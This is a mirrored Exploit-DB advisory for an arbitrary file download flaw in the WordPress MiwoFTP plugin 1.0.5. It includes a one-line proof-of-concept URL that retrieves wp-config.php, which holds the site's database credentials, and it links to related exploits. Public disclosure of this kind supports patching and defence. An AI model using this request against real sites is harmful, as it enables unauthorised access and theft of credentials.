bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/36774.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
926 B
Text
Raw Blame History

# Exploit Title :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
# Vendor :Miwisoft LLC
# Vendor Homepage :http://www.miwisoft.com
# Version :1.0.5
# Tested on :Win7/Chrome/Firefox
# Exploit Author :Necmettin COSKUN =>@babayarisi
# Discovery date :04/15/2015
MiwoFTP is a file manager plugin for Wordpress.
Description
================
Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.
Poc Exploit
================
http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
================
#RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic
#http://www.exploit-db.com/exploits/36763/
#http://www.exploit-db.com/exploits/36762/
#http://www.exploit-db.com/exploits/36761/
================
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
Reference in a new issue View git blame Copy permalink